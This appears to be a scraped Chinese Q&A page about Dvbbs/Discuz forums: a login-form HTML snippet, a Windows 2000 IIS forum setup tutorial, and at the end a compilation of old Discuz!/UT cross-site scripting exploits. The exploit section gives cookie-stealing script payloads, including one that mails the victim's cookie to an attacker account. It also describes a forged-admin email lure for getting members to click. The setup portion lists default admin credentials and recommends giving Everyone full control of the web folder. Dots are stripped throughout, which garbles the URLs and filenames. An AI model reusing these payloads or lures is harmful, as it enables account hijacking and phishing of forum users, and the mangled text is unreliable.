动网论坛登陆入口(研究过动网的进)

动网论坛登陆入口(研究过动网的进),第1张

<div id="Layer1" style="position:absolute; left:118px; top:169px; width:156px; height:188px; z-index:1"><!--loginasp##论坛登录部分主体-->

<table cellspacing="1" cellpadding="3" align="center" class="tableBorder2">

<tr>

<td height="25" valign="middle"><a href=http://zjdartcom:8099/regasp>

<font style="font-size:12px;line-height;color:#0000FF; ">论坛注册</font></a><a href="indexasp"></a><a href="loginasp"></a>

<a name="top"></a></td>

</tr>

</table>

<!--loginasp##论坛登录部分主体-->

<table cellpadding="3" cellspacing="1" align="center" class="tableborder1">

<form action="http://zjdartcom:8099/loginaspaction=chk" method="post">

<tr>

<td valign="middle" class="tablebody1"><font style="font-size:12px;line-height;color:#0000FF; ">用户名</font><br>

<input name="username" type="text" size="15"></td>

</tr>

<tr>

<td valign="middle" class="tablebody1"><font style="font-size:12px;line-height;color:#0000FF; ">密码</font><br>

<input name="password" type="password" size="15"></td>

</tr>

<tr>

<td class="tablebody1" valign="top">

<input type="radio" name="userhidden" value="2" checked><font style="font-size:12px;line-height;color:#0000FF; ">正常</font>

<input type="radio" name="CookieDate" value="0" checked><font style="font-size:12px;line-height;color:#0000FF; ">不存</font>

</td>

</tr>

<input type="hidden" name="comeurl" value="indexasp">

<tr>

<td class="tablebody2" valign="middle" align="center">

<input type="submit" name="submit" value="登录">

</td>

</tr>

</form>

</tr>

</table>

<table cellpadding="3" cellspacing="1" align="center" class="tableborder1">

<form action="http://zjdartcom:8099/loginaspaction=chk" method="post">

<input type="hidden" name="comeurl" value="indexasp">

</form>

</tr>

</table>

</div>

<table><tr><td>

<table cellpadding=3 cellspacing=1 align=center class=tableborder1>

<tr><td>

<form action="http://wwwzjdartcom:8099/loginaspaction=chk" method=post>

</td></tr>

<tr>

<td valign=middle class=tablebody1>用户名</td></tr><tr>

<td valign=middle class=tablebody1><INPUT name=username type=text></td></tr>

<tr>

<td valign=middle class=tablebody1>密码</td></tr><tr>

<td valign=middle class=tablebody1><INPUT name=password type=password></td></tr>

<tr>

<td valign=middle class=tablebody1><input type=radio name=CookieDate value=0 checked>不保存

</td></tr>

<tr>

<td valign=middle class=tablebody1> <input type=radio name=userhidden value=2 checked>正常登录

</td></tr>

<input type=hidden name=comeurl value="indexasp">

<tr>

<td class=tablebody2 valign=middle colspan=2 align=center><input type=submit name=submit value="登 录"></td></tr></form></table>

</td></tr></table>

把这段代码放到你的网站首页内 就可以了!

论坛还是用discuz吧 这个以后用UCenter可以很好地整合其他系统或者门户

而且discuz比较兼容

discuz是现在主流的论坛系统

phpwind也还可以 PHP环境下也有很多人用

动网主要是ASP环境下的 现在用的人不太多了

总之 还是建议使用discuz

论坛是BBS的一种形式,在论坛里,人们之间的交流打破了空间、时间的限制。在与别人进行交往时,无须考虑自身的年龄、学历、知识、社会地位、财富、外貌,健康状况,而这些条件往往是人们在其他交流形式中无可回避的。而这些论坛是如何架设的呢?那么今天我们就来看一下目前网络上流行的三种格式论坛在Windows 2000 Server下的架设方法吧。

目前网络上流行的三种格式论坛分别是:ASP论坛、CGI论坛和PHP论坛。我们从中挑选出他们的代表性论坛学习架设,ASP-动网论坛、CGI-雷傲论坛、PHP-Discuz!论坛。

首先配置动态域名解析:登陆wwworaynet注册网域护照,在护照底下申请域名(网域科技提供了免费域名注册),激活域名对应的花生壳服务,下载安装花生壳客户端,在局域网内PC或服务器主机上安装花生壳客户端登陆在线。

我们先来看一下ASP的动网论坛架设方法,动网论坛的架设方法相对来说比较简单一些。首先,服务器要安装IIS服务,然后在硬盘上建立一个文件夹名字为Web,路径为D盘,然后打开控制面板->管理工具->Internet服务管理器,新建一个Web站点,IP地址分配为您本机的IP,默认端口80不变。

下一步出现输入Web主目录的提示,这里就输入您刚才建立的那个文件夹的绝对路径或者是直接使用浏览来指定。最后出现权限设置对话窗口,为了后面要架设的论坛,这里我们把“执行(例如ISAPI应用程序或CGI)”的权限也选择上,点击下一步,完成。

到现在为止,您D盘下的Web文件夹就是你Web服务的主目录了,这里就可以放置你要发布的主页了。然后到http://bbsdvbbsnet/download/Dvbbs700_Acexe下载动网论坛70Sp2的程序,解压缩后把里面所有的内容都复制到D:\web目录下,然后打开IE浏览器,输入http://您的IP/indexasp,比如我的本机IP为1921680244,这样我就输入http://1921680244/indexasp。如果出现一下画面,说明我们安装成功了。

动网论坛的默认管理员账号是:admin密码是:admin888,使用这个账号登陆就会看到管理的连接,点击管理连接使用默认管理员账号和密码进入后台管理,在这里您就可以设置您的论坛了,关于论坛的设置这里就不多讲了。

接下来看一下CGI的雷傲论坛架设方法,到http://wwwleobbscom/download/getleobbscgi下载LeoBBSX 040926 正式版程序。解压缩后把文件夹cgi-bin和non-cgi复制到你所建的Web主目录(d:\web)中,要架设CGI论坛首先要求服务器支持Perl解析,而IIS并不支持Perl解析,所以我们要安装Perl解析,我所使用的是ActivePerl V584810 For Windows。因为雷傲论坛的解析路径是#!/usr/bin/perl(用记事本打开雷傲论坛的代码第一行就是),所以安装解析的时候要注意安装在USR路径。

然后点击 “OK” 一直 “next” 安装就行了,可能到最后的安装时间很长。下面我们就要设置其他项目了,点击 “开始”-> “运行” 输入regedit启动注册表编辑器。寻找HKEY_LOCAL_MACHINE\System\Currentcontrlset\Services

\W3svc\Parameters\ScriptMap\ 目录项,在此项中添加如下字串值:

键名 "cgi" 键值 "C:\USR\BIN\perlexe %s %s"

键名 "pl" 键值 "C:\USR\BIN\perlexe %s %s"

然后打开控制面板->管理工具->Internet服务管理器,右击你刚才创建的Web站点,选择 “属性” 就会出现XXX属性,点击 “主目录” 在下面有个 “配置”,点击进入 “应用程序配置” 窗口,点击 “添加”,在 “可执行文件” 输入C:\usr\bin\perlexe %s %s,在 “扩展名” 输入cgi脚本引擎打上钩,点确定即可。

点击 “ISAPI筛选器”->“添加”,在 “筛选器名称” 处输入cgi 在 “可执行文件” 处输入C:\usr\bin\PerlISdll然后点击确定。

关闭所有窗口重新启动机器,启动完毕后,打开浏览器,输入http://您的IP/cgi-bin/installcgi就会出现LeoBBSX安装向导,沿着安装向导进行初始设置。

设置完毕后会直接进入论坛管理后台,然后设置论坛就可以了,这里也不多讲了。

最后我们看一下PHP的Discuz!论坛架设方法,架设Discuz!论坛不但需要服务器支持PHP而且需要MYSQL数据库的支持。

MYSQL-4021-win

下载地址:http://wwwskycncom/soft/1262html

php-439-Win32

下载地址:http://wwwskycncom/soft/9122html

将MYSQL-4021-winzip解压缩,然后运行setup。选择安装路径,比如我安到了C:\mysql。安装方默认就可以。一路狂点next,整个安装过程大概也就2、3分种。MySql装好了,下面就是配置了,在C盘根目录下建立一个文件mycnf的文本文件,内容如下:

[mysql]

basedir = d:/mysql/

其中basedir是你安装MySql的路径。安装完毕后点击 “开始”-> “运行”输入命令C:\mysql\bin\mysqld-ntexe –install,然后重新启动计算机。打开C:\mysql\bin\winmysqladminexe在第一次用它时,需要建立管理员名及密码,分别设置用户名和密码,设定后,系统托盘会出现一个“红绿灯”的小图标(以后系统启动时均会自动加载),这样MySql就安装完成了。下面就要安装PHP解析了,将压缩包解压缩到C:\php文件夹中,把C:\php\Php4tsdll复制到C:\WINNT\SYSTEM32目录下,将phpini-dist改名为phpini双击打开此文件,找到extension_dir这句修改为extension_dir= “c:/php/extensions” 然后复制phpini到C:\WINNT目录下,点击开始->运行输入regedit启动注册表编辑器寻找:

HKEY_LOCAL_MACHINE\System\Currentcontrlset\Services

\W3svc\Parameters\ScriptMap\ 目录项。

在此项中添加如下字串值:

键名 "PHP" 键值 "C:\php\phpexe %s %s"

然后打开控制面板->管理工具->Internet服务管理器,右击你刚才创建的Web站点,选择 “属性” 就会出现XXX属性,点击 “主目录” 在下面有个 “配置”,点击进入 “应用程序配置” 窗口,点击 “添加”,在 “可执行文件” 输入C:\php\sapi\php4isapidll在 “扩展名” 输入php脚本引擎打上钩,点确定即可。

点击 “ISAPI筛选器”->“添加”,在 “筛选器名称” 处输入php 在 “可执行文件” 处输入C:\php\sapi\php4isapidll然后点击确定,可以关闭属性窗口了。

最后重新启动计算机,启动完毕后服务器就支持PHP+MYSQL了。在Web(D:\web)主目录下建立一个文件infophp,内容如下:

<php

phpinfo();

>

然后在浏览器中输入http://您的IP/infophp,关于服务器的详细信息都显示了出来。

解压缩后把Discuz!文件夹改名为BBS复制到你所建的Web主目录(web)中,打开浏览器输入http://您的IP/bbs/installphp就会出现Discuz!论坛的安装向导。

选择完全同意,然后出现选择数据库的选项。

因为是演示所以我们就不建立新的数据库了,Mysql安装后自带2个数据库mysql和test,这里我使用test数据库,如果大家要建立论坛使用的话,务必建立新的数据库,并且设置数据库的用户名和密码。

下一步会让你建立一个管理员账号和密码,建立完毕后就开始安装了。

如果出现一下字样,刷新一边就可以。

Cache List: settings index style_ usergroup_1

Caches successfully created, please refresh

现在看看,论坛的模样是不是很漂亮?使用你建立的管理员账户登陆,就可以看到有系统设置的字样,进入后就是论坛后台设置了,这里也不多说了,按照自己的喜好建立论坛吧。

最后说一下以上架设服务器要注意的问题:

1如果Windows 2000 Server使用的是NTFS分区格式,可能会出现错误,这是因为没有写入权限,只要把Web文件夹安全属性中的Everyone用户给予完全控制权限就可以。

2安装完毕IIS以后,先停止IIS服务,然后删除IIS的默认安装目录C:\Inetpub,因为微软默认安装的漏洞实在是太多太多,另外建立其他WEB目录。

3MYSQL也可以结合MYSQL ODBC数据源进行数据库的建立,需要安装MYSQL ODBC。

4PHPini有很多模块可以打开,结合MYSQL和其他PHP语言选择性开放,毕竟服务器安全是重要的。

这样三种格式的论坛架设完毕了,您的服务器也变成了IIS+CGI+PHP+Mysql了,再提醒一句:注意服务器的安全问题!

相关名词解释:

BBS——Bulletin Board Service(公告牌服务),是Internet上的一种电于信息服务系统。它提供一块公共电子白板,每个用户都可以在上面书写,可发布信息或提出看法。

ASP——ASP即Active Server Page(活动服务器页面)的缩写,是一个编程环境,在其中,可以混合使用HTML、脚本语言以及组件来创建服务器端功能强大的Internet应用程序。

CGI——CGI即common gate intergace(通用网关接口)的缩写,它是一段程序,运行在服务器上,提供同客户端HTML页面的接口。通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器,再把服务器执行的结果返还给HTML页。

PHP——PHP(PHP Hypertext Preprocessor,最初称为"Personal Home Page Tools",也称为"Professional Homepages",或者"Pre-Hypertext Processor"),是一种服务器端HTML-嵌入式脚本描述语言。

IIS----IIS是Internet Information Server的缩写,微软公司的Web服务器。

首先你也申请一个论坛空间,在网上搜索一些比较大型的网络空间提供商吧,注册好后,需要注册一个国际域名,然后再到BBSDVBBSNET这是一个中国来说比较大的论坛开发商,他开发的是动网论坛,可以免费下载使用!是ASP的,你可以http://bbsleobbscom/这是CGI雷傲论坛,http://wwwdiscuznet/这里可以下载PHP论坛,你申请空间的时候看好,你需要什么样格式的论坛,然后看你空间支持什么格式!

然后到我上面提供的地址去下载你需要的论坛,PJP论坛安全性比较大,我建议你就使用PHP的,详细教程,在论坛提供商里有叫你怎么架设这论坛的!

在后台管理的界面中,看左边的菜单,第一个 常规管理 中有一个 基本设置

点击后在页面右边最上面点 [基本信息]

把论坛名称:动网论坛 改成你论坛的名字

把网站名称:动网先锋 改成你公司的名字

论坛访问地址,如果论坛不对外开放,直接填写所在服务器的IP地址+论坛所在目录名,如: http://10110/bbs/ 即可

网站访问地址,可填写公司内部地址即可

建立论坛版块

在 常规管理 的下面是 论坛管理,点其中的 版面(分类)添加

首先是要建立论坛分类,填写分类的名称,如:论坛站务,在论坛名称中填写"论坛站务",版面说明可以什么也不写或随便写点什么,版面规则不用管,所属类别不用动,直接点添加论坛就可以了!

这样论坛站务就成为论坛中的一个分类,你可以在 论坛站务 分类下添加该分类的版块--论坛投诉\斑竹申请\意见建议等

如想在分类下添加版块,还是点 版面(分类)添加 填写版块名称(如:意见意见),版面介绍要填写好,版面规则不用管,接下来注意的是在 所属类别 的下拉菜单中选择刚刚建立的分类"论坛站务",添加该版块的版主,可以先写你自己的用户,以后可以更改!如想设置多个版主可用|分隔,如:沙滩小子|wodeail 点添加论坛,这样在 论坛站务 就会出现一个叫做 意见建议 的版块

在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。 例如 http://xxx/postphpaction=newthread&fid=2cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用方法:把上述代码放置到img中。 适用版本:discuz!2x discuz!3x 一种利用discuz!20漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan) http://XXX/pmphpaction=send&username=XXXFan 因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如 http://XXX/pmphpaction=send&username=XXXFan "><script>alert(documentscookie)</script><b%20" 上面的链接点击以后首先弹出的是自己的cookie内容。 当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于 getcookiephpcookie= 但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,"帖子介绍给朋友"功能。 因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说"论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励"等等。 因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在<script>里的内容加密,以进一步增加隐蔽性。 至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 本方法适用于大部分使用discuz20的论坛,至于discuz30的利用方法请参与在我以前发表的discuz!悄悄话漏洞 BUGDiscuz!投票的BUG 投票可以用 miscphpaction=votepoll&fid=2&tid=16980&pollanswers[]=n (n为选项,从0开始) 的方式通过URL来直接投票 但是如果n>最大选项呢,嘻嘻~ 照样提交成功,不过增加了一个标题为空的选项 效果见: http://discuznet/viewthreadphptid=20020&sid=dymPEc (那个最后的空白的是我刚加的) 该漏洞存在的版本: Discuz!3X Discuz!2X(可能,没有测试过) Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。 具体的描述就不说了,下面是一个简单的测试代码。 /Article/UploadFiles/200412/20041225232318260gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2XMLHTTP%22);Reqopen(%22post%22,%22 http://wwwXXXXcom/forum/pmphpaction=send%22,false);var%20forms=%22pmSubmit=Submit%22toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documentscookie);ReqsetRequestHeader(%22Content-length%22,formslength)%3BReqsetRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Reqsend(forms);%3c/script%3e%3cb%22 [ /img] 发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。 有关具体的消息可以参阅: http://wwwcertorg/advisories/CA-2000-02html 下面针对Discuz、UT论坛程序的悄悄话部分加以说明 漏洞适应版本: Discuz1X Discuz!20(0609,0820版) Discuz!3X UT 10 漏洞描述: discuz!给指定会员发送悄悄话使用的是类似 http://wwwXXXXnet/phpbbs/pmphpaction=send&username=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3X已经改为 http://XXXnet/pmphpaction=send&uid=XXXX 类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 例 http://wwwXXXXnet/phpbbs/pmphpaction=sd&username=name %22%3E%3Cscript%3Ealert(documentscookie)%3C/script%3E%3Cb%22[/URL] ,上面的例子是显示自己的cookie。(针对Discuz!1X Discuz!2X) http://XXXnet/pmphpfolder=inbox%22%3E%3cript%3E%3Cb%22 显示自己的cookie。(针对Discuz!3X) UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞)

希望采纳

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 动网论坛登陆入口(研究过动网的进)

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情